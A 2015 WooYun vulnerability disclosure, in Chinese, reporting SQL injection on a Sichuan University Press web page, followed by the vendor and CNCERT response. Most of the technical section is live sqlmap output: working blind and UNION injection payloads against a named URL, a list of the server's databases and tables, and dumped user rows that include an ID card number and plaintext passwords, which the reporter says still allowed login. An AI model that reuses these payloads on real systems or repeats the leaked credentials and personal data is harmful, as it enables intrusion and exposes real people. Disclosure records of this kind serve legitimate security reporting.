漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0102641
漏洞标题:四川大学出版社SQL注入漏洞
相关厂商:四川大学出版社
漏洞作者: venc
提交时间:2015-03-24 11:47
修复时间:2015-05-11 15:54
公开时间:2015-05-11 15:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-27: 厂商已经确认,细节仅向厂商公开
2015-04-06: 细节向核心白帽子及相关领域专家公开
2015-04-16: 细节向普通白帽子公开
2015-04-26: 细节向实习白帽子公开
2015-05-11: 细节向公众公开
简要描述:
四川大学出版社SQL注入漏洞
详细说明:
url:http://www.scup.cn/press.asp?id=353
参数ID有注入
上sqlmap:
sqlmap identified the following injection points with a total of 88 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=353 AND 7175=7175
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-2880 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(97)+CHAR(105)+CHAR(99)+CHAR(113)+CHAR(118)+CHAR(80)+CHAR(109)+CHAR(115)+CHAR(113)+CHAR(114)+CHAR(67)+CHAR(84)+CHAR(109)+CHAR(90)+CHAR(113)+CHAR(120)+CHAR(99)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [120]:
[*] aaalxffff
[*] aijiafensjzx
[*] aishang
[*] alphy
[*] baobeishua
[*] bob4http128f
[*] bs0305
[*] byzdb
[*] carrian
[*] cbnz
[*] cdcw
[*] cdxgn
[*] ceshi2014
[*] cfs19820109cfs368
[*] ch2rapms
[*] count
[*] cqbqcn
[*] czygbb
[*] daoqin
[*] db1343414976
[*] db410252331
[*] db_wjinynyangzhi_6
[*] dearutopia
[*] dfyh120
[*] dtnotary_com
[*] dxjobfp5ijz
[*] dy19
[*] fshdatabase
[*] ftppzyy
[*] fuzhpf2
[*] gdzkedu
[*] ggzpdbnet
[*] guoxixi
[*] gzseres020
[*] hazel8881
[*] hbzhiteng
[*] heahee
[*] heiyu585
[*] heiyu617
[*] heyusql
[*] highwaytunnelcn
[*] huangliang
[*] huangxingcheng
[*] hzgying2
[*] industry
[*] jd10012
[*] jd10013
[*] jeffsoftweb
[*] jhgww2
[*] jinfanx731
[*] jisu
[*] joyleon
[*] junkissyou2
[*] kanbixi
[*] kingcardms
[*] leja168
[*] linchengjia
[*] lptsg1
[*] lszxy
[*] luchengshangwu
[*] lxyzs
[*] master
[*] mhnydb
[*] milan
[*] model
[*] msdb
[*] mswydata2010
[*] mydercn
[*] myljkj_syc
[*] myxibumssql
[*] Northwind
[*] nuantutrips
[*] opticalsells
[*] pubs
[*] pyst
[*] qddb
[*] qingdaolzt
[*] qqvst
[*] ragrwhg
[*] SCHOOL
[*] scnb3
[*] scupwww
[*] scxiew
[*] shanxi1
[*] shijianguoke
[*] sqsony01
[*] st666666
[*] suntianyu
[*] szfstk
[*] szhnkj
[*] szzx20150208
[*] tbcoo
[*] tempdb
[*] TMS_BJ_HAJYWL
[*] topniao
[*] vipcsy
[*] w19891106x
[*] wgc928
[*] www831rc
[*] www_intler_com
[*] WXM_Database001
[*] wzljxx
[*] xhmt6688
[*] xiaozhu
[*] xinvedns
[*] xiyuanpop
[*] xjwsyxw
[*] xrbg
[*] xududu
[*] xwbd88
[*] xylol
[*] yaoxirong
[*] ybjxwy
[*] YBXGAJ100Data
[*] yh89317877
[*] ypqdmz
[*] zfbhok
[*] zgjsx2013
[*] zhanluecehua
[*] zhengbo
用的是scupwww库:
back-end DBMS: Microsoft SQL Server 2000
Database: scupwww
[53 tables]
+----------------------+
| Sheet1$ |
| adv |
| award |
| book_catalog_CCL_bak |
| book_catalog_CCL_bak |
| book_catalog_CCL_bak |
| book_catalog_Index |
| book_inhibit |
| book_rebuild |
| book_recommend_Index |
| book_recommend_brief |
| book_sample |
| book_series_index |
| book_week_select |
| bookcatalog |
| bookstore_top |
| carry_type |
| copyright |
| downloads |
| dtproperties |
| forecasting |
| friendlink |
| hacker |
| index_table |
| info |
| item_title |
| news |
| organization |
| prebook |
| press_top |
| review |
| sales_month_update |
| sales_month_update |
| sales_season_update |
| sales_season_update |
| sales_week_update |
| sales_week_update |
| school |
| select_title |
| select_topic |
| series_select |
| storage_update |
| storage_update |
| sysconstraints |
| syssegments |
| user_order |
| usercart |
| userclicker |
| userfav |
| userinfo |
| usernote |
| usersale |
| village |
+----------------------+
userinfo:
back-end DBMS: Microsoft SQL Server 2000
Database: scupwww
Table: userinfo
[80 entries]
+--------------------+------------+---------+------------+---------+---------+---------+------------------------------------+------------+----------+--------------+-----------------+---------------+------------+-------------+-----------+-------------------------+-----------+------------+-------------+--------------------+
| identity_card | QQ | sex | MSN | unit | city | area | address | country | postcode | username | password | telephone | pw_answer | cellphone | real_name | emailbox1 | emailbox2 | user_grade | pw_question | register_date |
+--------------------+------------+---------+------------+---------+---------+---------+------------------------------------+------------+----------+--------------+-----------------+---------------+------------+-------------+-----------+-------------------------+-----------+------------+-------------+--------------------+
| 510781199809289601 | <blank> | 0 | <blank> | NULL | <blank> | <blank> | <blank> | <blank> | <blank> | 锛~L锛~L锛~L娴╂旦 | qwer,2 | <blank> | <blank> | <blank> | 鎫]~N鎫@~]鐍P | 1805874271,@@.com | NULL
| NULL | <blank> | 11 11 2012 12:00AM |
| <blank> | <blank> | 0 | <blank> | NULL | <blank> | <blank> | <blank> | <blank> | <blank> | .... | 8783287+ | <blank> | <blank> | <blank> | 鎫]~N鍉R~L | <blank> | NULL | NULL | <blank> | 12 27 2010 12:00AM |
密码竟然明文的,试了下可以登录
漏洞证明:
已证明
修复方案:
版权声明:转载请注明来源 venc@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-03-27 15:52
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置.
最新状态:
暂无